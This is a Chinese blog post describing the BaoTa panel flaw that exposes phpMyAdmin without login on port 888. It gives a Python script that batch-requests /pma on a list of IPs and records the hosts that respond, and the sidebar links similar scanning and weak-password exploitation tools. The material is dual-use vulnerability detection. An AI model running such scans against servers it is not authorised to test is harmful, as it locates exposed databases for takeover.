python 批量检测宝塔pma漏洞的脚本

最新推荐文章于 2024-06-21 15:30:00 发布
最新推荐文章于 2024-06-21 15:30:00 发布
阅读量545 收藏 4
点赞数
分类专栏: 扫描 批量扫描 python 文章标签: python 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39650046/article/details/110467959
版权
python 同时被 3 个专栏收录
4 篇文章 1 订阅
订阅专栏
扫描
2 篇文章 0 订阅
订阅专栏
批量扫描
2 篇文章 0 订阅
订阅专栏

漏洞详情:
宝塔官方表示,7.4.2(Linux)版本的宝塔面板存在未授权访问phpmyAdmin的漏洞,漏洞利用难度为“0”,通过访问ip:888/pma则可无需任何登录操作直接进入phpmyAdmin,所有使用宝塔的站点均可测试是否存在此漏洞(未修改默认端口,安装了phpmyAdmin的均存在可能);

影响范围
    宝塔 linux 7.4.2(安装了 phpmyadmin)
    宝塔 Linux 7.5.13(安装了 phpmyadmin)
    宝塔 windows 6.8(安装了 phpmyadmin)

这里我写了一个批量检测该漏洞的脚本,先把找到存在开放888端口的ip放到文件中,然后就可以批量检测是否存在pma目录,存在就输出到创建的文件中。

import requests

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0'}

with open(r'路径','r',encoding = 'utf-8') as f:
	a = f.readlines()
	path = "/pma"
	for i in a:
		if i == "\n":
			continue;
		else:
			a = i.strip()
			url = a + path
			try:
				r = requests.get(url , headers = headers , timeout = 5).status_code
				if r == 200:
					c = '有漏洞' + ':' + url
					with open(r'存在漏洞输出的地址','a',encoding = 'utf-8') as f:
						f.write(c)
				else:
					print('无')
				pass
			except:
				print('无法连接')
天眼1
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
strust2漏洞批量检查利用python脚本
05-17
python2.7,暂不支持python3,需安装几个python模块。
宝塔pma
whojoe的博客
09-01 470
Apache Solr rce复现(CVE-2019-0193)前言环境搭建参考文章 前言 影响版本 宝塔Linux面板7.4.2版本 宝塔Linux测试版7.5.13 Windows面板6.8版本 环境搭建 启动docker systemctl start docker 启动容器 docker pull tim2docker/baota2:v1 docker images docker run -d -p 8888:8888 -p 888:888 -p 2279:2279 <your IMAGE
记一次服务器入侵事件的应急响应
最新发布
2401_84466336的博客
06-21 1168
我们推测攻击者不止一个,并且都是通过SSH弱口令入侵服务器。事件时间线如下图所示:第一波攻击者可能是挖矿组织,在5月7日大概率利用SSH弱口令进入服务器上传挖矿程序somescript,且做了对应的维持手段。第二波攻击者可能是黑产组织,攻击时间为7月16日至7月17日,其操作是对网站做黑帽SEO,更改宝塔后台并上传大量后门。第三波攻击者应该只是想控制一批跳板机,在8月17日上传了代理程序,目前在服务器上出现的恶意事件最后截止也是到8月17日。
python写端口批量扫描器
weixin_30466953的博客
08-16 128
 用到shodan模块 话不多说,马上开始 pip3 install shodan import shodan SHODAN_API_KEY=" 你的shodankey" api = shodan.Shodan(SHODAN_API_KEY) try: results=api.search("3389") print ('Results found: %s' %...
phpmyadmin批量检测工具
洋洋的小黑屋
06-03 1061
#coding=utf-8 import requests url = "dict.txt" print("phpmyadmin目录扫描器") filpath = "/phpMyAdmin/" with open(url,'r') as f: for line in f.readlines(): line = line.strip() r_url = "http://" + line + filpath r = requests.get(r_url).
宝塔面板PMA漏洞批量扫描工具
spkiddai
08-24 3587
#!/usr/bin/env python # -*- coding:utf-8 -*- """ Author spkiddai """ import sys import argparse import requests from multiprocessing import Pool, Manager print(""" __ .__ .___ .___ .__ ____________ | | _|__| __| _/__| _/_.
pma_python:用于PMA.start的Python包装器库,用于整个幻灯片成像和显微镜检查的通用查看器
04-14
pma_python pma_pythonPMA.start( )的Python包装库,该库是Pathomation的通用查看器,用于整个幻灯片成像和显微镜检查。 您必须先运行PMA.START(或PMA.CORE)才能使用此库。 PMA_PYTHON不是WSI的独立库。 ...
Python库 | pma_python-2.0.0.92.tar.gz
05-20
资源分类:Python库 所属语言:Python 资源全名:pma_python-2.0.0.92.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | pma_python-2.0.0.66.tar.gz
05-20
资源分类:Python库 所属语言:Python 资源全名:pma_python-2.0.0.66.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
4PMA - MetaTrader 4脚本.zip
09-11
指标 4PMA
PyPI 官网下载 | pma_python-2.0.0.112.tar.gz
01-14
标题 "PyPI 官网下载 | pma_python-2.0.0.112.tar.gz" 提供了几个关键信息。首先,PyPI(Python Package Index)是Python社区广泛使用的软件包仓库,用于发布和下载开源Python项目。这里提到的是一个名为 `pma_...
phpmyadmin弱口令批量利用3传(ok)
06-29
phpmyadmin弱口令批量利用3传(ok) 批量执行,仅供网络测试
PC版宝塔漏洞批量扫描软件2020版
08-27
1.单个扫描只扫描域名列表第一个 2.批量扫描则扫描全部。 使用须知: 本程序只对未更新宝塔的用户有效, 如果扫出来的地址进不去,说明改网站宝塔版本已经更新了。
宝塔php漏洞,[安全预警]关于最近宝塔闹得很厉害的PMA漏洞BUG
weixin_28946137的博客
03-26 529
文章前言在2020年8月23日的下午有个憨憨管理在我群艾特全员 说宝塔爆出漏洞了赶快更新吧!影响机器需同时满足以下所有条件1、软件版本为Linux面板7.4.2 或者Windows面板6.8.02、开放888且未配置http认证,3、安装了phpmyadmin,mysql数据库不受影响机器只需满足一条则不受影响1、未开放888端口,2、针对888端口做了严格的安全认证,3、未安装phpmyadmi...
宝塔执行sh文件_宝塔面包PHPMyadmin未授权访问漏洞
weixin_33791488的博客
01-16 211
深信服的EDR任意用户登录刚完宝塔面板又出现PHPMyadmin未授权访问漏洞简介:没啥说的影响范围:Linux:7.4.2Windows:6.8触发方式:http://IP:888/pma修复方式:宝塔面板在线更新或者使用升级脚本(注意:优先在面板首页直接点更新,失败的情况下,才使用此命令,且不能在面板自带的SSH终端执行):curl https://download.bt.cn/in...
网传宝塔“0day”挂马事件—附检测脚本
afei001
12-18 1317
宝塔面板疑似出现重大安全漏洞。遭到攻击的服务器,Nginx会自动检测header中accept字段是否包含Gzip。如果包含,则会向目标页面中加入一段JS引用,从而实现恶意挂马。
python漏洞利用脚本_MS15-034 Python脚本漏洞检测
weixin_39939661的博客
12-18 352
import requests代码区域print(" =================================================")print(" ")print(" MS15-034 漏洞 CheckList(WEB安全...
golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本(CVE202017530)...
weixin_30696613的博客
12-26 465
声明由于传播、利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,博鸿科技安全服务中心以及文章作者不为此承担任何责任。博鸿科技安全服务中心拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经博鸿科技安全服务中心允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。0x00 软件介绍strut...
Xilinx LogiCORE IP Guide: 1G/2.5G Ethernet PCS/PMA & SGMII v16.1 Design
本篇文档是Xilinx公司发布的关于1G/2.5G Ethernet PCS/PMA (Physical Coding Sublayer/Physical Medium Attachment) 或者 SGMII (Serializer/Deserializer) v16.1的LogiCORE IP产品指南,适用于Vivado Design Suite...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值